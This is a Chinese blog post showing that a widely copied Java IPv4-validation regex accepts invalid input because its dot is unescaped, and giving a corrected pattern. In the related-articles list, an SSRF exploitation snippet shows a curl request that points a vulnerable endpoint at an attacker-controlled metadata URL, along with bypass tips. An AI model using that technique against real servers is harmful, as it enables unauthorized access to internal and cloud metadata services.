关于网络上IP地址校验正则表达式的一点缺陷

最新推荐文章于 2024-08-22 16:57:03 发布
最新推荐文章于 2024-08-22 16:57:03 发布
阅读量127 收藏
点赞数
文章标签: 正则表达式

 网络上常见的代码如下:


static boolean isIpAddress(String s){
        String regex = "(((2[0-4]\\d)|(25[0-5]))|(1\\d{2})|([1-9]\\d)|(\\d)).(((2[0-4]\\d)|(25[0-5]))|(1\\d{2})|([1-9]\\d)|(\\d))
.(((2[0-4]\\d)|(25[0-5]))|(1\\d{2})|([1-9]\\d)|(\\d)).(((2[0-4]\\d)|(25[0-5]))|(1\\d{2})|([1-9]\\d)|(\\d))";
        Pattern p = Pattern.compile(regex);
        Matcher m = p.matcher(s);
        return m.matches();
    }


经过测试,发现像“1.1.112”这样不合法的IP也可以通过校验
对0~255的校验“((2[0-4]\\d)|(25[0-5]))|(1\\d{2})|([1-9]\\d)|(\\d)”,这段代码应该没问题了,问题就出在对“.”的处理上,于是,改成如下:


static boolean isIpAddress(String s){
        String regex = "(((2[0-4]\\d)|(25[0-5]))|(1\\d{2})|([1-9]\\d)|(\\d))[.](((2[0-4]\\d)|(25[0-5]))|(1\\d{2})|([1-9]\\d)|(\\d))
[.](((2[0-4]\\d)|(25[0-5]))|(1\\d{2})|([1-9]\\d)|(\\d))[.](((2[0-4]\\d)|(25[0-5]))|(1\\d{2})|([1-9]\\d)|(\\d))";
        Pattern p = Pattern.compile(regex);
        Matcher m = p.matcher(s);
        return m.matches();
    }


成功!!!  



iteye_7235
关注
[网络提高篇] 一一二.DataCon Coremail邮件安竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,负青春。
几种常见的Web攻击
wolfGuiDao的博客
08-17 1088
几种常见的Web攻击 文章目录几种常见的Web攻击一、DoS攻击1.SYN洪水攻击2.IP欺骗3.Land攻击4.针对DoS攻击的防御二、CSRF攻击1. CSRF攻击的发生有三个必要条件:2.几种防护方法:三、XSS漏洞攻击1.非持久型XSS漏洞2.持久型XSS漏洞四、SQL注入1.SQL注入的危害2.SQL注入的方式3.防止SQL注入的解决方案 一、DoS攻击 DoS(Denial of Service),拒绝服务,顾名思义这种攻击是为了让服务器无法提供正常服务,最常见的DoS攻击是网络带宽攻击和连
java正则表达式验证IP地址
06-27
java正则表达式验证IP地址
正则表达式校验IP地址
weixin_34010949的博客
07-16 408
转载于:https://blog.51cto.com/5880861/1675330
IP地址正则校验
weixin_44563526的博客
08-22 475
”196.23.23.23;196.23.32.3-12“校验可以通过。
ip地址正则校验
weixin_46649054的博客
06-24 7078
iPv4的ip地址都是(1255).(0255).(0255).(0255)的格式 我这里的写法没有考虑两种情况,一是172.00.01.3这种,前面以零开头,或者多个零的这种情况,二是本网络地址,如果想支持,可根据下面的解释进行扩展。 下面给出相对应的正则表达式: “^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.” +"(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\." +"(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|
正则表达式验证Ip地址
Joe's technical blog
12-14 1133
正则表达式验证Ip地址及说明
正则表达式
06-08
虽然提供的算法程序存在缺陷,但是通过正则表达式处理字符串,确实可以设计出高效的方法来去除重复字符,这对于优化数据存储、减少冗余信息很有帮助。需要注意的是,去除重复字符时应考虑到字符顺序的保持,以及避免...
python实现socket网络编程笔记,TCP/IP协议相关知识
fannyoona的博客
05-31 2532
学到啥记啥,有点乱。。。 python网络编程一、UDP1、IP地址和端口2、udp发送数据3、udp聊天器二、TCP1、tcp简介2、tcp客户端3、tcp服务器4、案例:文件下载器 一、UDP 1、IP地址和端口 私有ip在公网中使用的 10.0.0.0~10.255.255.255 172.16.0.0~172.31.255.255 192.168.0.0~192.168.255.255 127.0.0.1~127.255.255.255用于回路测试 如:127.0.0.1可以代表本地ip地址
常见网络设备
weixin_46162146的博客
04-03 8888
Web应用防火墙(WAF) 为什么需要WAF? WAF(web application firewall)的出现是由于传统防火墙无法对应用层的攻击进行有效抵抗,并且IPS也无法从根本上防护应用层的攻击。因此出现了保护Web应用安的Web应用防火墙系统(简称“WAF”)。 什么是WAF? WAF是一种基础的安保护模块,通过特征提取和分块检索技术进行特征匹配,主要针对 HTTP访问的Web程序保护...
IP 正则表达式验证
12-12
最后写了一个IP地址正则表达式验证程序。 代码如下:((25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(25[0-5]|2[0-4]\d|1?\d?\d) 截图如下: 您可能感兴趣的文章:javascript 手机号码正则表达式验证函数JS正则表达式验证数字代码JavaScript正则表达式验证身份证号码是否合法(两种方法)jquery正则表达式验证(手机号、身份证号、中文名称)邮箱地址正则表达式验证代码合集软件开发网特别版java正则表达式验证邮箱、电话号码示例jquery使用正则表达式验证email地址的方法利用js正则
js 验证IP地址
02-07
js 验证IP地址
正则表达式验证IP地址
实践求真知
04-12 1099
一 代码 应用正则表达中的点字符(.) <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> <?php $checkip="/^(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]{1}[
【验证IP地址——正则表达式详解】
weixin_48703800的博客
09-15 1万+
IP 地址验证有效性(python) - 正则表达式
正则表达式验证格式(ip地址,数字整数验证)的简单使用.
weixin_40340362的博客
11-03 8732
首先是正则表达式的一些字符认识 "^" :^会匹配行或者字符串的起始位置,有时还会匹配整个文档的起始位置。 "$" :$会匹配行或字符串的结尾 "\b" :会消耗任何字符只匹配一个位置,常用于匹配单词边界 "\d":配数字0~9. "\w":匹配字母,数字,下划线.,等价于[A-Za-z_0-9] "\s":匹配空格 ".":匹配除了换行符以外的任
前端校验IPV4、IPV6格式正则校验
Smile_Gently的博客
07-12 6055
IPV4、IPV6格式正则校验
ip和端口号的正则表达式
码农研究僧的博客
06-16 1万+
这里写目录标题一级目录前言1. ip地址2. 端口号3. ip:端口号 一级目录 前言 ip以及端口号的正则表达式 在逻辑应用比较广泛 对于更多的知识点可看我java框架: java框架零基础从入门到精通的学习路线(超) 1. ip地址 关于可用的ip地址可看我之前写的一篇文章: 可使用的局域网地址范围 【1-9】表示取1到9的数字范围,这种是取值的正则 第一个数字((25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d))) 250-255,正则为25[0-5] 200到249,正
验证IP地址(字符串分割判断、正则表达式
IT之一小佬的博客
11-15 1511
验证IP地址(字符串分割判断、正则表达式
如何计算IP首部校验和Header CheckSum(计算详解、代码解析、例子)
热门推荐
染落林间色的博客
10-26 1万+
首部校验和是在网络通信中常用的一种校验方法,用于验证数据包在传输过程中是否出现了错误或损坏。通常应用于网络层协议(如IP协议)的首部中。
ssrf漏洞利用实战
最新发布
01-15
### SSRF漏洞实战利用方法与技巧 #### 本地主机绕过技术 攻击者常常尝试通过各种方式来访问内部网络资源,即使目标应用试图阻止对`localhost`或其他内网地址的请求。一种常见的方式是使用特殊的域名或IP表示法,比如可以使用`http://localtest.me`或者IPv6环回地址`[::1]`来进行绕过[^4]。 #### 构造恶意URL 为了成功实施SSRF攻击,构造能够被服务器解析并执行预期行为的有效载荷至关重要。这可能涉及到创建特制的HTTP请求字符串,该字符串指向受控环境下的Web服务端口监听器,或者是云存储桶、元数据API等敏感位置。例如: ```bash curl http://example.com/vulnerable_endpoint?url=http://attacker-controlled-server/metadata-service ``` #### 利用开放重定向 如果应用程序存在未加防护的重定向功能,则可以通过提交精心设计的目标链接参数触发间接访问受限资源的行为。这种情况下,尽管原始输入看似无害,但最终可能导致未经授权的数据泄露或命令注入风险增加。 #### 测试同协议和服务 除了标准的HTTP(S),还应考虑其他潜在可利用的服务接口,如FTP, SMB, DNS查询等。某些特定场景下,这些非传统渠道反而更容易成为突破口。对于每种可能性都需进行面测试以发现隐藏的安隐患。 #### 绕过白名单过滤机制 当遇到基于正则表达式的简单黑名单/白名单校验逻辑时,往往能找出边界条件上的缺陷从而实现规避目的。例如,针对只允许指定子域的情况,可通过添加额外路径片段使验证失效;又或是借助通配符特性巧妙组合成合法形式却实际指向非法目的地的URL模式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值